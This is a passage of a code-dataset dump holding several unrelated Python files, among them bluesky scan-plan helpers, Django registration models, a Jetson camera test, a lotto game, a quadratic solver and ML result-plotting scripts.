:func:`bluesky.plan_stubs.caching_repeater`\n    \"\"\"\n    it = range\n    if n is None:\n        n = 0\n        it = itertools.count\n\n    for j in it(n):\n        yield from gen_func(*args, **kwargs)\n
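\n\n# Quick illustration (``det`` is hypothetical): ``repeater(3, one_shot, [det])`` chains\n# the messages of three consecutive one_shot plans; with ``n=None`` it repeats until\n# interrupted.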
\n\ndef caching_repeater(n, plan):\n    \"\"\"\n    Generate n chained copies of the messages in a plan.\n\n    This is different from ``repeater`` above because it takes in a\n    generator or iterator, not a function that returns one.\n\n    Parameters\n    ----------\n    n : int or None\n        total number of repetitions; if None, infinite\n    plan : iterable\n\n    Yields\n    ------\n    msg : Msg\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.repeater`\n    \"\"\"\n    warnings.warn(\"The caching_repeater will be removed in a future version \"\n                  \"of bluesky.\", stacklevel=2)\n    if n is None:\n        gen = itertools.count(0)\n    else:\n        gen = range(n)\n\n    lst_plan = list(plan)\n    for _ in gen:\n        yield from (m for m in lst_plan)\n\n\ndef one_shot(detectors, take_reading=None):\n    \"\"\"Inner loop of a count.\n\n    This is the default function for ``per_shot`` in count plans.\n\n    Parameters\n    ----------\n    detectors : Iterable[OphydObj]\n        devices to read\n\n    take_reading : plan, optional\n        function to do the actual acquisition ::\n\n           def take_reading(dets, name='primary'):\n                yield from ...\n\n        Callable[List[OphydObj], Optional[str]] -> Generator[Msg], optional\n\n        Defaults to `trigger_and_read`\n    \"\"\"\n    take_reading = trigger_and_read if take_reading is None else take_reading\n    yield Msg('checkpoint')\n    yield from take_reading(list(detectors))\n\n\ndef one_1d_step(detectors, motor, step, take_reading=None):\n    \"\"\"\n    Inner loop of a 1D step scan\n\n    This is the default function for the ``per_step`` param in 1D plans.\n\n    Parameters\n    ----------\n    detectors : iterable\n        devices to read\n    motor : Settable\n        The motor to move\n    step : Any\n        Where to move the motor to\n    take_reading : plan, optional\n        function to do the actual acquisition ::\n\n           def take_reading(dets, name='primary'):\n                yield from ...\n\n        Callable[List[OphydObj], Optional[str]] -> Generator[Msg], optional\n\n        Defaults to `trigger_and_read`\n    \"\"\"\n    take_reading = trigger_and_read if take_reading is None else take_reading\n\n    def move():\n        grp = _short_uid('set')\n        yield Msg('checkpoint')\n        yield Msg('set', motor, step, group=grp)\n        yield Msg('wait', None, group=grp)\n\n    yield from move()\n    return (yield from take_reading(list(detectors) + [motor]))\n\n\ndef move_per_step(step, pos_cache):\n    \"\"\"\n    Inner loop of an N-dimensional step scan without any readings\n\n    This can be used as a building block for custom ``per_step`` stubs.\n\n    Parameters\n    ----------\n    step : dict\n        mapping motors to positions in this step\n    pos_cache : dict\n        mapping motors to their last-set positions\n    \"\"\"\n    yield Msg('checkpoint')\n    grp = _short_uid('set')\n    for motor, pos in step.items():\n        if pos == pos_cache[motor]:\n            # This step does not move this motor.\n            continue\n        yield Msg('set', motor, pos, group=grp)\n        pos_cache[motor] = pos\n    yield Msg('wait', None, group=grp)\n\n\ndef one_nd_step(detectors, step, pos_cache, take_reading=None):\n    \"\"\"\n    Inner loop of an N-dimensional step scan\n\n    This is the default function for the ``per_step`` param in ND plans.\n\n    Parameters\n    ----------\n    detectors : iterable\n        devices to read\n    step : dict\n        mapping motors to positions in this step\n    pos_cache : dict\n        mapping motors to their last-set positions\n    take_reading : plan, optional\n        function to do the actual acquisition ::\n\n           def take_reading(dets, name='primary'):\n                yield from ...\n\n        Callable[List[OphydObj], Optional[str]] -> Generator[Msg], optional\n\n        Defaults to `trigger_and_read`\n    \"\"\"\n    take_reading = trigger_and_read if take_reading is None else take_reading\n    motors = step.keys()\n    yield from move_per_step(step, pos_cache)\n    yield from take_reading(list(detectors) + list(motors))\n
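\n\n# Note on custom ``per_step`` hooks (illustrative): they usually keep the two-phase\n# shape shown in one_nd_step above -- move the motors that changed via move_per_step,\n# then take a single reading of the detectors together with the motors.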
\n\ndef repeat(plan, num=1, delay=None):\n    \"\"\"\n    Repeat a plan num times with delay and checkpoint between each repeat.\n\n    This is different from ``repeater`` and ``caching_repeater`` in that it\n    adds ``checkpoint`` and optionally ``sleep`` messages if delay is provided.\n    This is intended for users who need the structure of ``count`` but do not\n    want to reimplement the control flow.\n\n    Parameters\n    ----------\n    plan: callable\n        Callable that returns an iterable of Msg objects\n    num : integer, optional\n        number of repetitions; default is 1\n\n        If None, repeat until interrupted\n    delay : iterable or scalar, optional\n        time delay between successive repeats; default is no delay\n\n    Notes\n    -----\n    If ``delay`` is an iterable, it must have at least ``num - 1`` entries or\n    the plan will raise a ``ValueError`` during iteration.\n    \"\"\"\n    # Create finite or infinite counter\n    if num is None:\n        iterator = itertools.count()\n    else:\n        iterator = range(num)\n\n    # If delay is a scalar, repeat it forever. If it is an iterable, leave it.\n    if not isinstance(delay, Iterable):\n        delay = itertools.repeat(delay)\n    else:\n        try:\n            num_delays = len(delay)\n        except TypeError:\n            # No way to tell in advance if we have enough delays.\n            pass\n        else:\n            if num - 1 > num_delays:\n                raise ValueError(\"num=%r but delays only provides %r \"\n                                 \"entries\" % (num, num_delays))\n        delay = iter(delay)\n\n    def repeated_plan():\n        for i in iterator:\n            now = time.time() # Intercept the flow in its earliest moment.\n            yield Msg('checkpoint')\n            yield from ensure_generator(plan())\n            try:\n                d = next(delay)\n            except StopIteration:\n                if i + 1 == num:\n                    break\n                elif num is None:\n                    break\n                else:\n                    # delay provided fewer entries than the requested num repeats\n                    raise ValueError(\"num=%r but delays only provides %r \"\n                                     \"entries\" % (num, i))\n            if d is not None:\n                d = d - (time.time() - now)\n                if d > 0: # Sleep if and only if time is left to do it.\n                    yield Msg('sleep', None, d)\n\n    return (yield from repeated_plan())\n","repo_name":"bluesky/bluesky","sub_path":"bluesky/plan_stubs.py","file_name":"plan_stubs.py","file_ext":"py","file_size_in_byte":33522,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"37"} +{"seq_id":"25107524699","text":"import random\nimport base64\nfrom .models import db, IPs\nfrom . import app
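\n\n# Note: random.seed() with no argument (below) seeds from the OS entropy source, so\n# each fresh database initialisation draws different IP numbers.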
\n\nrandom.seed()\n\ndef setIPnumber():\n    return \".\".join([str(random.randint(20, 170)) for _ in range(4)])\n\ndef setIPs():\n\n    with app.app_context():\n        if IPs.query.count() == 0:\n            for i in range(20):\n                number = setIPnumber()\n                value = random.randint(50, 80)\n                question = IPs(number=number, value=value)\n                db.session.add(question)\n                db.session.commit()\n            for i in range(20):\n                number = setIPnumber()\n                value = random.randint(60, 90)\n                question = IPs(number=number, value=value, isDanger=True)\n                db.session.add(question)\n                db.session.commit()\n\n\nsetIPs()\n","repo_name":"chetTEst/CyberSecuLab","sub_path":"lesson 2.1.2/flask_app/app/SetTasks.py","file_name":"SetTasks.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42683605412","text":"import random\nlotto1=random.randint(1,61)\nlotto2=random.randint(1,61)\nlotto3=random.randint(1,61)\nlotto4=random.randint(1,61)\nlotto5=random.randint(1,61)\nprint(\"estratti\",lotto1,lotto2,lotto3,lotto4,lotto5)\n# int() so the comparisons with the drawn integers below actually work\nnumero1=int(input(\"primo numero\"))\nnumero2=int(input(\"secondo numero\"))\nnumero3=int(input(\"terzo numero\"))\nnumero4=int(input(\"quarto numero\"))\nnumero5=int(input(\"quinto numero\"))\n\nindovinati=0\nif numero1==lotto1 or numero1==lotto2 or numero1==lotto3 or numero1==lotto4 or numero1==lotto5:\n    indovinati=indovinati+1\nif numero2==lotto1 or numero2==lotto2 or numero2==lotto3 or numero2==lotto4 or numero2==lotto5:\n    indovinati=indovinati+1\nif numero3==lotto1 or numero3==lotto2 or numero3==lotto3 or numero3==lotto4 or numero3==lotto5:\n    indovinati=indovinati+1\nif numero4==lotto1 or numero4==lotto2 or numero4==lotto3 or numero4==lotto4 or numero4==lotto5:\n    indovinati=indovinati+1\nif numero5==lotto1 or numero5==lotto2 or numero5==lotto3 or numero5==lotto4 or numero5==lotto5:\n    indovinati=indovinati+1\nprint(\"indovinati\",indovinati)\n\n\n","repo_name":"MarcoInc/Python_Exercises","sub_path":"Esercizi/Superenalotto.py","file_name":"Superenalotto.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11599310413","text":"from math import sqrt\ndef real_equal(a,b,c):\n    root=(-b)/(2*a)\n    print(\"Root is\")\n    print(root)\n\ndef real_unequal(a,b,c):\n    root1=(-(b+(sqrt((b*b)-(4*a*c)))))/(2*a)\n    root2=(-(b-(sqrt((b*b)-(4*a*c)))))/(2*a)\n    print(\"Roots are\\n\")\n    print(root1)\n    print(root2)\n\ndef condition_check(a,b,c):\n    cond=((b**2)-(4*a*c))\n    if(cond>0):\n        print(\"Determinant is more than 0\\n\"+\"So roots are real and unequal\")\n        real_unequal(a,b,c)\n    if(cond==0):\n        print(\"Determinant is equal to 0\\n\"+\"So roots are real and equal\")\n        real_equal(a,b,c)\n    if(cond<0):\n        print(\"Determinant is less than 0\\n\"+\"So roots are imaginary\")\n\nif __name__ == '__main__':\n    print(\"All quadratic equations are in the form ax2+bx+c=0\\n\"+\"To find roots of a quadratic equation we need a,b,c values\")\n    try:\n        a = int(input(\"Enter value of a :\"))\n        b = int(input(\"Enter value of b :\"))\n        c = int(input(\"Enter value of c :\"))\n    except:\n        print(\"Enter correct values\")\n        exit()\n    if(a == 0):\n        print(\"It's not a quadratic equation\")\n        exit()\n    condition_check(a,b,c)\n","repo_name":"harshareddy794/Python-scripts","sub_path":"Quadratic equation solver/ Quadratic_equation_solver.py","file_name":" 
Quadratic_equation_solver.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9755049096","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\nfrom django.conf import settings\nimport os,datetime\nfrom django.utils import timezone\nfrom dashboard.models import TeamEvent\n\n\n#from events.models import Event\ndef upload_handler(model_name):\n def upload_func(instance, filename):\n return os.path.join(model_name, instance.title, filename)\n return upload_func\nBRANCH_CHOICES = (\n ('School','School'),\n ('Arts', 'Arts'),\n ('Accounting', 'Accounting'),\n ('Applied Mechanics', 'Applied Mechanics'),\n ('Mechatronics', 'Mechatronics'),\n ('Aerospace Engineering', 'Aerospace Engineering'),\n ('Automobile Engineering', 'Automobile Engineering'),\n ('Biotech / Biochemical / Biomedical', 'Biotech / Biochemical / Biomedical'),\n ('Biology', 'Biology'),\n ('Ceramic Engineering', 'Ceramic Engineering'),\n ('Chemical Engineering', 'Chemical Engineering'),\n ('Chemistry', 'Chemistry'),\n ('Design', 'Design'),\n ('Engineering Design', 'Engineering Design'),\n ('Civil Engineering', 'Civil Engineering'),\n ('Computer Science and Engineering', 'Computer Science and Engineering'),\n ('Electronics and Communications Engineering', 'Electronics and Communications Engineering'),\n ('Electrical and Electronics Engineering', 'Electrical and Electronics Engineering'),\n ('Electrical Engineering', 'Electrical Engineering'),\n ('Electronics and Instrumentation Engineering', 'Electronics and Instrumentation Engineering'),\n ('Engineering Physics', 'Engineering Physics'),\n ('Economics', 'Economics'),\n ('Fashion Technology', 'Fashion Technology'),\n ('Humanities and Social Sciences', 'Humanities and Social Sciences'),\n ('Industrial Production', 'Industrial Production'),\n ('Production', 'Production'),\n ('Information Technology and Information Science', 'Information Technology and Sciences'),\n ('Management', 'Management'),\n ('Manufacturing', 'Manufacturing'),\n ('Mathematics', 'Mathematics'),\n ('Metallurgy and Material Science', 'Metallurgy and Material Science'),\n ('Mechanical Engineering', 'Mechanical Engineering'),\n ('Ocean Engineering and Naval Architecture', 'Ocean Engineering and Naval Architecture'),\n ('Physics', 'Physics'),\n ('Telecom', 'Telecom'),\n ('Textile Engineering', 'Textile Engineering'),\n ('Others', 'Others'),\n)\n\nGENDER_CHOICES = (('M', 'Male'), ('F', 'Female'))\n\nSTATE_CHOICES = (\n ('Andhra Pradesh', 'Andhra Pradesh'),\n ('Arunachal Pradesh', 'Arunachal Pradesh'),\n ('Assam', 'Assam'),\n ('Bihar', 'Bihar'),\n ('Chhattisgarh', 'Chhattisgarh'),\n ('Goa', 'Goa'),\n ('Gujarat', 'Gujarat'),\n ('Haryana', 'Haryana'),\n ('Himachal Pradesh', 'Himachal Pradesh'),\n ('Jammu And Kashmir', 'Jammu And Kashmir'),\n ('Jharkhand', 'Jharkhand'),\n ('Karnataka', 'Karnataka'),\n ('Kerala', 'Kerala'),\n ('Madhya Pradesh', 'Madhya Pradesh'),\n ('Maharashtra', 'Maharashtra'),\n ('Manipur', 'Manipur'),\n ('Meghalaya', 'Meghalaya'),\n ('Mizoram', 'Mizoram'),\n ('Nagaland', 'Nagaland'),\n ('Orissa', 'Orissa'),\n ('Punjab', 'Punjab'),\n ('Rajasthan', 'Rajasthan'),\n ('Sikkim', 'Sikkim'),\n ('Tamil Nadu', 'Tamil Nadu'),\n ('Tripura', 'Tripura'),\n ('Uttar Pradesh', 'Uttar Pradesh'),\n ('Uttarakhand', 'Uttarakhand'),\n ('West Bengal', 'West Bengal'),\n ('Andaman And Nicobar Islands', 'Andaman And Nicobar 
Islands'),\n    ('Chandigarh', 'Chandigarh'),\n    ('Dadra And Nagar Haveli', 'Dadra And Nagar Haveli'),\n    ('Daman And Diu', 'Daman And Diu'),\n    ('Lakshadweep', 'Lakshadweep'),\n    ('NCT/Delhi', 'NCT/Delhi'),\n    ('Puducherry', 'Puducherry'),\n    ('Outside India', 'Outside India'),\n)\n\nRATING_CHOICES = (('1', '1-Very Bad'), ('2', '2-Bad'), ('3', '3-Good'), ('4', '4-Very Good'), ('5', '5-Excellent'),\n)\nSOURCE_CHOICES = (('Facebook', 'Facebook'),('Twitter','Twitter'),('IIT Madras Website','IIT Madras Website'),('Newspaper ad','Newspaper ad'),('I have been a regular Shaastra visitor','I have been a regular Shaastra visitor'),('I am an IITM student','I am an IITM student'),('Other','Other')\n)\nclass College(models.Model):\n\n    name = models.CharField(max_length=255,\n            help_text='The name of your college. Please refrain from using short forms.'\n            )\n    city = models.CharField(max_length=30,\n            help_text='The name of the city where your college is located. Please refrain from using short forms.'\n            )\n    state = models.CharField(max_length=40, choices=STATE_CHOICES,\n            help_text='The state where your college is located. Select from the drop down list'\n            )\n\n    def __unicode__(self):\n        return '%s, %s, %s' % (self.name, self.city, self.state)\n\n    class Admin:\n\n        pass\n\ndef default_key_expires():\n    # Callable default so the expiry is computed when each profile is created,\n    # not once at module import time.\n    return timezone.now() + datetime.timedelta(2)\n\nclass UserProfile(models.Model):\n\n    user = models.ForeignKey(User, unique=True)\n    gender = models.CharField(max_length=1, choices=GENDER_CHOICES,\n                              default='F') # Defaults to 'girl' ;-)\n    age = models.IntegerField(default=18)\n    # help_text='You need to be over 12 and under 80 years of age to participate'\n    # No age limit now.\n    branch = models.CharField(max_length=50, choices=BRANCH_CHOICES,\n                              help_text='Your branch of study')\n    mobile_number = models.CharField(max_length=15, blank=True, null=True,\n                                     help_text='Please enter your current mobile number')\n    college = models.ForeignKey(College, null=True, blank=True)\n    college_roll = models.CharField(max_length=40, null=True)\n\n    shaastra_id = models.CharField(max_length = 20, unique = True, null=True)\n\n    activation_key = models.CharField(max_length=40, null=True)\n    key_expires = models.DateTimeField(default=default_key_expires)\n    want_accomodation = models.BooleanField(default=False, help_text = \"Doesn't assure accommodation during Shaastra.\")\n    school_student = models.BooleanField(default=False)\n    is_core = models.BooleanField(default=False)\n    is_hospi = models.BooleanField(default=False)\n\n#    facebook_id = models.CharField(max_length=20)\n#    access_token = models.CharField(max_length=250)\n    def save(self, *args, **kwargs):\n        self.user.save()\n        super(UserProfile, self).save(*args, **kwargs)\n    \n    def delete(self, *args, **kwargs):\n        self.user.delete()\n        super(UserProfile, self).delete(*args, **kwargs)\n    \n    def __unicode__(self):\n        return self.user.first_name\n    \n    def get_regd_events(self):\n        tevlist = []\n        tevlist=TeamEvent.objects.filter(users__username=self.user.username)\n        #TODO: return events with TDP first!! 
sort by has_tdp\n        return tevlist\n    \n    def no_regd_events(self):\n        return len(self.get_regd_events())\n    \n    class Admin:\n        pass\n\n\n    \nclass shows_updates(models.Model):\n    shows_name = models.CharField(max_length=255,\n            help_text='Name of the Show'\n            )\n    update = models.CharField(max_length=255,help_text='Update field')\n    def __unicode__(self):\n        return '%s %s'%(self.shows_name,self.update)\n    class Meta:\n        ordering=['-id']\n    \nEVENT_CATEGORIES = (\n        ('Aerofest', 'Aerofest'),\n        ('Coding', 'Coding'),\n        ('Design and Build', 'Design and Build'),\n        ('Involve', 'Involve'),\n        ('Quizzes', 'Quizzes'),\n        ('Online', 'Online'),\n        ('Department Flagship', 'Department Flagship'),\n        ('Spotlight', 'Spotlight'),\n        ('Workshops', 'Workshops'),\n        ('Exhibitions', 'Exhibitions and Shows'),\n        ('Associated Events', 'Associated Events'),\n        ('Sampark', 'Sampark'),\n        )\n\nUPDATE_CATEGORY = (\n        ('Major Update', 'Major Update'),\n        ('Updates', 'Updates'),\n        )\n\nclass Tag(models.Model):\n    name = models.CharField(max_length=25)\n\n    def __unicode__(self):\n        return self.name\n    \nclass feedbackmodel(models.Model):\n\thow_comprehensive_was_the_information_in_the_website= models.CharField(max_length=30, choices=RATING_CHOICES,default='2')\n\thow_did_you_find_the_navigation_in_the_website= models.CharField(max_length=30, choices=RATING_CHOICES,default='2')\n\tkindly_rate_the_theme_of_the_website= models.CharField(max_length=30, choices=RATING_CHOICES,default='2')\n\thow_did_you_come_to_know_of_Shaastra= models.CharField(max_length=30, choices=SOURCE_CHOICES,default = 'Facebook')\n\tany_other_suggestions= models.TextField(blank = True)\n\t\n\nclass SponsLogoUploads(models.Model):\n    logo1 = models.FileField(upload_to=upload_handler('sponslogo'), blank=True, null=True)\n    logo2 = models.FileField(upload_to=upload_handler('sponslogo'), blank=True, null=True)\n    logo3 = models.FileField(upload_to=upload_handler('sponslogo'), blank=True, null=True)\n    #more fields to be added when max number of uploads is known\n\n","repo_name":"ShaastraWebops/shaastra_temporary_mainsite","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25402752361","text":"import time\nfrom solve import solve\n# fin=open(\"solve.py\")\n# exec(fin.read())\n\ncnt=0\nwhile True:\n    inname=\"io/\"+str(cnt)+\".in\"\n    try:\n        fin=open(inname,\"r\")\n    except:\n        break\n\n    fout=open(\"act/\"+str(cnt)+\".out\",\"w\")\n\n    t0=time.time()\n    ok=1\n    try:\n        #solve.solve(fin,fout)\n        solve(fin,fout)\n    except:\n        ok=0\n    mt=time.time()-t0\n\n\n    fin.close()\n    fout.close()\n\n    with open(\"act/\"+str(cnt)+\".info\",\"w\") as f:\n        f.write(\"{:d} {:.4f}\\n\".format(ok, mt))\n\n    cnt=cnt+1\n","repo_name":"czylabsonasa/tesztelek2","sub_path":"apps/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2692569838","text":"import cv2\nimport time\n\n\ndef gstreamer_pipeline(sensor_id=0, exposure=500000, capture_width=1280, capture_height=720, \n                       display_width=640, display_height=360, framerate=120, flip_method=0): \n\tpipeline = f\"nvarguscamerasrc sensor-id={sensor_id} exposuretimerange='{int(exposure)} {int(exposure)+1}' !\\\n\t\t\t\tvideo/x-raw(memory:NVMM), width=(int){capture_width}, height=(int){capture_height}, \\\n\t\t\t\tframerate=(fraction){framerate}/1 ! nvvidconv flip-method={flip_method} ! \\\n\t\t\t\tvideo/x-raw, width=(int){display_width}, height=(int){display_height}, format=(string)BGRx ! \\\n\t\t\t\tvideoconvert ! video/x-raw, format=(string)BGR ! appsink\"\n\treturn(pipeline)\n
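\n\n# Note (assumption worth verifying against NVIDIA's nvarguscamerasrc docs): the\n# exposuretimerange values are in nanoseconds, so exposure=3.5E+4 in main() below\n# requests roughly a 35 microsecond exposure.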
\n\ndef main():\n\tpipeline = gstreamer_pipeline(exposure=3.5E+4)\n\tprint(pipeline)\n\n\tcap = cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)\n\told_time = time.time()\n\t\n\tif cap.isOpened():\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\tret, frame = cap.read()\n\t\t\t\tnew_time = time.time()\n\t\t\t\tdt = new_time - old_time\n\t\t\t\told_time = new_time\n\t\t\t\tfps = 1/dt\n\t\t\t\tcv2.putText(frame, f'FPS {fps:.1f}', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, \n\t\t\t\t\t\t\tfontScale=0.8, color=(0, 255, 0), thickness=1, lineType=cv2.LINE_4) \n\t\t\t\tcv2.imshow(\"camera\", frame)\n\n\t\t\t\tk = cv2.waitKey(1)\n\t\t\t\tif k == 27 or k == ord('q'): break\n\t\t \n\t\tfinally:\n\t\t\tcap.release()\n\t\t\tcv2.destroyAllWindows()\n\telse:\n\t\tprint(\"Error: Unable to open camera\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"naoya1110/csi_camera_for_jetson_nano","sub_path":"camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9302868238","text":"import cv2\nfrom collections import defaultdict\nfrom math import log10\n\nenergy_threshold = 0.1\nmaxlen = 10\n\ndef cache_results(face_prediction, confidence, default_dict, energy, learning_rate):\n    score = 0\n    prev_score = 0\n    prev_label = ''\n\n    if(energy > energy_threshold):\n        if(confidence > 60):\n            values = default_dict.get(face_prediction, None)\n            if (values is None):\n                default_dict[face_prediction].append(confidence)\n            else:\n                i = getIndex(values, confidence)\n                if(len(values) < maxlen):\n                    values.insert(i, confidence)\n                else:\n                    if(confidence > values[-1]):\n                        del values[-1]\n                        values.insert(i, confidence)\n                    else:\n                        energy -= learning_rate * energy + 1\n        energy -= 1\n    else:\n        for label, values in default_dict.items():\n            size = len(values)\n            score = 10*size + sum(values)/size\n            # print(\"Score: %s\" %score +\" Label: %s\" %label + \" Size: %s\" %size)\n            if(score > prev_score):\n                prev_score = score\n                prev_label = label\n    return prev_label, prev_score, energy\n\ndef getIndex(values, confidence):\n    index = 0\n    for v in values:\n        if(confidence <= v):\n            index += 1\n        else:\n            break\n    return index\n\ndef clearCache(face_prediction):\n    return None\n
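\n# Rough usage sketch (illustrative; ``pred`` and ``conf`` are hypothetical per-frame\n# outputs of a recogniser):\n#\n#     cache = defaultdict(list)\n#     label, score, energy = cache_results(pred, conf, cache, energy, 0.1)\n#\n# While energy stays above energy_threshold, confident predictions accumulate in the\n# cache; once it drops, the best-supported label and its score are returned.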
\n# PSEUDO #\n#if energy > energy_threshold\n#    if default_dict does not have face_prediction as a Key\n#        default_dict[face_prediction].append(confidence)\n\n#    if default_dict already has face_prediction as a Key\n#        take the list of Value:confidence associated with the Key:face_prediction\n#        if len(Values) < 10 then insert confidence at position i [e.g. if confidence = 8 --> [14, 13, 10, i, 6, 4]]\n#        otherwise \n#            if confidence > lastElement(Values)\n#            then delete the last element in Values (the lowest) and insert confidence at position i\n#            otherwise decrement energy\n#    decrement energy\n\n#otherwise \n#    delete from default_dict every [Key:Values] for which len(values) == 1\n#    compute the score = (Sum(default_dict[Key].Values[i]))/len(Values)\n#    store the pair [face_prediction, score] in scores_list\n#    return face_prediction, score from max(score) in scores_list\n\n# ALTERNATIVE - append at the end of the list and then sort for each label\n","repo_name":"Basionkler/Sentry-Assistant","sub_path":"Sentry-Assistant/dict_create.py","file_name":"dict_create.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10480921385","text":"\n\n#A function to identify the original dir in R Studio\ndef identify_dir(collection, id_work, id_year, id_month, id_day):\n    id_date = id_year + \"_\" + id_month + \"_\" + id_day\n    work_location = \"collection/\" + collection + \"/\" + id_work\n    date_location = id_work + \"_\" + id_year + \"/\" + id_work + \"_\" + id_year + \"_\" + id_month + \"/\" + id_work + \"_\" + id_date\n    dirname = \"/data/user/l/pclanglais/\" + work_location + \"/\" + date_location\n    return(dirname)\n\n# A class to store all the elements regarding the location of a doc.\nclass DocIndex(object):\n\n    def __init__(self, collection, work, year, month, day, page):\n        self.collection = collection\n        self.work = work\n        self.year = year\n        self.month = month\n        self.day = day\n        self.page = page.split(\"_\")\n        self.directory = identify_dir(collection, work, year, month, day)\n    \n#doc_id = DocIndex(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6])\n\n\n# A class to store all the elements regarding a text block\nclass TextBlock(object):\n\n    def __init__(self, id_text, id_line_word, line_text, content_text, coordinate_text, wc_text, size_text, font_text, font_style, begin_text, id_line, coordinate_line, height_block, width_block, hpos_block, vpos_block, style_block, shape_block, type_block, id_block, id_composed_block):\n        self.id_text = id_text\n        self.id_line_word = id_line_word\n        self.line_text = line_text\n        self.content_text = content_text\n        self.coordinate_text = coordinate_text\n        self.wc_text = wc_text\n        self.size_text = size_text\n        self.font_text = font_text\n        self.font_style = font_style\n        self.begin_text = begin_text\n        self.id_line = id_line\n        self.coordinate_line = coordinate_line\n        self.height_block = height_block\n        self.width_block = width_block\n        self.hpos_block = hpos_block\n        self.vpos_block = vpos_block\n        self.style_block = style_block\n        self.shape_block = shape_block\n        self.type_block = type_block\n        self.id_block = id_block\n        self.id_composed_block = id_composed_block\n\n\n# A class to store all the parsed elements of an ALTO document\nclass DataAlto(object):\n\n    def __init__(self, style, block_metadata, line_metadata, ocr_text, ngram):\n        self.style = style\n        self.block_metadata = block_metadata\n        self.line_metadata = line_metadata\n        self.ocr_text = ocr_text\n        self.ngram = ngram\n\n","repo_name":"Pclanglais/PyAlto","sub_path":"parse_alto_class.py","file_name":"parse_alto_class.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72829591147","text":"import jsonlines\nimport 
matplotlib.pyplot as plt\nimport analysis.plot_paths as plot_spec\nimport numpy as np\nimport time\n\ndef load_results(path):\n r = jsonlines.open(path+\"norm_reward.jsonl\")\n base_reward = []\n reward = []\n batch_size = 100\n base_reward_temp = []\n reward_temp = []\n for line in r:\n base_reward_temp.append(line[\"base_reward\"])\n reward_temp.append(line[\"reward\"])\n if len(base_reward_temp) >= batch_size:\n base_reward.append(np.mean(base_reward_temp))\n base_reward_temp = []\n reward.append(np.mean(reward_temp))\n reward_temp = []\n\n\n test_reward = []\n sentences = []\n batch_size = 5\n base_reward_temp = []\n r = jsonlines.open(path + \"results.jsonl\")\n for line in r:\n base_reward_temp.append(line[\"reward\"])\n if len(base_reward_temp) >= batch_size:\n #sentences.append(line[\"sentence\"])\n test_reward.append(np.mean(base_reward_temp))\n base_reward_temp = []\n return base_reward,reward,test_reward,sentences\n\n\ndef create_plot(exp_cur):\n fig = plt.figure()\n base_line_train = exp_cur[0][1]\n base_line_test = exp_cur[0][2]\n st = fig.suptitle(exp_cur[0][0], fontsize=\"x-large\")\n #plt_base_reward = fig.add_subplot(221)\n #plt.ylim(4,10)\n plt_reward = fig.add_subplot(121)\n plt_test = fig.add_subplot(122,sharey=plt_reward)\n\n\n max_len = 0\n max_len_test = 0\n\n for exp in exp_cur[1:]:\n\n exp_path = exp[0]\n base_reward,reward,test_reward,sentences = load_results(exp_path)\n\n\n\n #plt_base_reward.set_title('Train base reward')\n #plt_base_reward.set_xlabel('Train Iteration')\n #plt_base_reward.set_ylabel('Reward')\n\n plt_reward.set_title('Train reward')\n plt_reward.set_xlabel('100 Train Iteration')\n\n plt_test.set_title('Reward (No dropout)')\n plt_test.set_xlabel('100 Train Iterations')\n #plt_test.set_ylabel('Loss')\n\n if len(reward) > max_len:\n max_len = len(reward)\n if len(test_reward) > max_len_test:\n max_len_test = len(test_reward)\n\n #plt_base_reward.plot(base_reward)\n plt_reward.plot(reward)\n plt_test.plot(test_reward,label=exp[1])\n\n base_line = np.array([base_line_train for i in range(max_len)])\n plt_reward.plot(base_line)\n #plt_base_reward.plot(base_line)\n\n base_line = np.array([base_line_test for i in range(max_len_test)])\n plt_test.plot(base_line)\n\n #fig.set_figheight(15)\n fig.set_figwidth(15)\n fig.legend(loc='center right')\n #plt.subplots_adjust(wspace=0.6,hspace=0.6)\n\n #plt.tight_layout(rect=[0,0,0.7,0.95])\n fig.savefig(\"fig/{}.png\".format(exp_cur[0][0].strip(\" \")),bbox_inches = \"tight\")\n print(\"Saved: fig/{}.png\".format(exp_cur[0][0].strip(\" \")))\n\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad_sub/experiments/\"\n\nrank_rl_one_question = [\n (\"Rank Reward: Who else appeared with Beyonce in Telephone?\",0.333),\n (base_path + \"Transformer__12-18_16:02/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-18_16:03/\", \"Dropout 0.3\"),\n]\n\nrecall_rl_one_question = [\n (\"Recall Reward: Who else appeared with Beyonce in Telephone?\",0.0606),\n (base_path + \"Transformer__12-18_18:41/\", \"Dropout 0.2 - debut else appeared with beyonce in telephone ?\"),\n (base_path + \"Transformer__12-18_18:42/\", \"Dropout 0.3 - who else performed with beyonce in telephone ?\"),\n]\n\n\nrecall_rl = [\n (\"Recall Reward Q2Q Transformer\",0.1867,0.2205),\n (\"/media/jonas/archive/master/data/rl_squad/cluster_exp/19_12_19/experiments/\" + \"RL_Transformer__12-18_21:12/\", 